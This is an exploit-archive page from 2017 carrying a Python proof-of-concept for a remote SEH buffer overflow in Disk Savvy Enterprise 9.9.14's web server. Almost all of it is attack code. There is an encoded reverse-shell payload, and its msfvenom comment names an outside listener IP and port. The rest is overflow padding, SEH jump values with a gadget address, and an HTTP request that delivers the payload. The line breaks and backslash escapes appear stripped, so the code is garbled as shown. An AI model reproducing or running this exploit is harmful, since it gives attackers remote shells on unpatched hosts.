Home / os / winmobile

Disk Savvy Enterprise 9.9.14 Buffer Overflow

Posted on 29 August 2017

#!/usr/bin/env python # Exploit Title: Disk Savvy Enterprise 9.9.14 Remote SEH Buffer Overflow # Date: 2017-08-25 # Exploit Author: Nipun Jaswal & Anurag Srivastava # Author Homepage: www.pyramidcyber.com # Vendor Homepage: http://www.disksavvy.com # Software Link: http://www.disksavvy.com/setups/disksavvyent_setup_v9.9.14.exe # Version: v9.9.14 # Tested on: Windows 7 SP1 x64 # Steps to Reproduce : Go to Options --> Server --> Check Enable Web Server on Port, Enter Any Port[8080] --> Save import socket,sys target = "127.0.0.1" port = 8080 #msfvenom -p windows/shell_reverse_tcp LHOST=185.92.223.120 LPORT=4443 EXITFUN=none -e x86/alpha_mixed -f python buf = "" buf += "x89xe3xdaxdexd9x73xf4x5bx53x59x49x49x49" buf += "x49x49x49x49x49x49x49x43x43x43x43x43x43" buf += "x37x51x5ax6ax41x58x50x30x41x30x41x6bx41" buf += "x41x51x32x41x42x32x42x42x30x42x42x41x42" buf += "x58x50x38x41x42x75x4ax49x4bx4cx4dx38x6d" buf += "x52x35x50x37x70x65x50x71x70x6bx39x4dx35" buf += "x70x31x4bx70x63x54x6cx4bx56x30x76x50x4c" buf += "x4bx63x62x76x6cx4cx4bx50x52x76x74x4cx4b" buf += "x42x52x36x48x34x4fx58x37x51x5ax37x56x46" buf += "x51x79x6fx6ex4cx55x6cx31x71x51x6cx67x72" buf += "x34x6cx51x30x59x51x48x4fx36x6dx65x51x79" buf += "x57x59x72x6bx42x72x72x72x77x4cx4bx52x72" buf += "x76x70x6cx4bx61x5ax77x4cx6ex6bx42x6cx66" buf += "x71x50x78x6ax43x32x68x75x51x6bx61x36x31" buf += "x4ex6bx70x59x47x50x75x51x7ax73x4cx4bx30" buf += "x49x66x78x79x73x64x7ax73x79x6cx4bx45x64" buf += "x4cx4bx36x61x7ax76x50x31x6bx4fx4ex4cx4f" buf += "x31x7ax6fx36x6dx43x31x39x57x74x78x6bx50" buf += "x31x65x6bx46x43x33x53x4dx68x78x77x4bx33" buf += "x4dx31x34x44x35x78x64x56x38x6ex6bx36x38" buf += "x75x74x56x61x78x53x65x36x4ex6bx66x6cx30" buf += "x4bx6ex6bx33x68x65x4cx63x31x68x53x6cx4b" buf += "x65x54x4ex6bx33x31x58x50x6ex69x43x74x31" buf += "x34x65x74x53x6bx71x4bx71x71x46x39x72x7a" buf += "x53x61x39x6fx49x70x43x6fx61x4fx61x4ax4e" buf += "x6bx44x52x78x6bx6ex6dx33x6dx33x58x75x63" buf += "x50x32x35x50x37x70x32x48x54x37x70x73x34" buf += "x72x63x6fx66x34x62x48x52x6cx52x57x44x66" buf += "x43x37x39x6fx79x45x4cx78x4ex70x43x31x45" buf += "x50x57x70x34x69x6fx34x51x44x70x50x53x58" buf += "x76x49x6fx70x50x6bx33x30x79x6fx5ax75x50" buf += "x50x46x30x42x70x46x30x51x50x62x70x67x30" buf += "x70x50x30x68x79x7ax56x6fx69x4fx49x70x69" buf += "x6fx48x55x6fx67x52x4ax36x65x75x38x68x39" buf += "x33x6cx6bx6fx74x38x52x48x43x32x57x70x44" buf += "x51x71x4bx4cx49x4bx56x31x7ax72x30x56x36" buf += "x50x57x63x58x6dx49x6dx75x34x34x63x51x79" buf += "x6fx4bx65x6cx45x6bx70x43x44x36x6cx69x6f" buf += "x72x6ex76x68x52x55x48x6cx52x48x78x70x6c" buf += "x75x6fx52x52x76x4bx4fx4ex35x42x48x43x53" buf += "x50x6dx35x34x63x30x6ex69x4dx33x62x77x43" buf += "x67x56x37x75x61x39x66x42x4ax62x32x31x49" buf += "x70x56x69x72x39x6dx72x46x59x57x51x54x45" buf += "x74x77x4cx33x31x46x61x4ex6dx37x34x57x54" buf += "x56x70x68x46x47x70x62x64x36x34x46x30x61" buf += "x46x36x36x62x76x70x46x72x76x32x6ex61x46" buf += "x30x56x56x33x70x56x73x58x53x49x48x4cx55" buf += "x6fx4fx76x49x6fx4ax75x4fx79x39x70x52x6e" buf += "x72x76x37x36x4bx4fx56x50x61x78x65x58x4e" buf += "x67x57x6dx75x30x39x6fx59x45x6fx4bx78x70" buf += "x4dx65x4ex42x71x46x71x78x6ex46x6cx55x4f" buf += "x4dx6fx6dx79x6fx59x45x35x6cx53x36x53x4c" buf += "x54x4ax4dx50x6bx4bx4bx50x54x35x65x55x6d" buf += "x6bx63x77x55x43x43x42x32x4fx63x5ax43x30" buf += "x72x73x4bx4fx48x55x41x41" payload = buf # Shellcode begins from the start of the buffer payload += 'A' * (2492 - len(payload)) # Padding after shellcode till the offset value payload += 'xEBx10x90x90' # NSEH, a short jump of 10 bytes payload += 'xDDxADx13x10' # SEH : POP EDI POP ESI RET 04 libpal.dll payload += 'x90' * 10 # NOPsled payload += 'xE9x25xBFxFFxFF' # Second JMP to ShellCode payload += 'D' * (5000-len(payload)) # Additional Padding s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect((target,port)) print "[*] Connection Success." except: print "Connction Refused %s:%s" %(target,port) sys.exit(2) packet = "GET /../%s HTTP/1.1 " %payload # Request & Headers packet += "Host: 4.2.2.2 " packet += "Connection: keep-alive " packet += "Referer: http://pyramidcyber.com " packet += " " s.send(packet) s.close()

 

TOP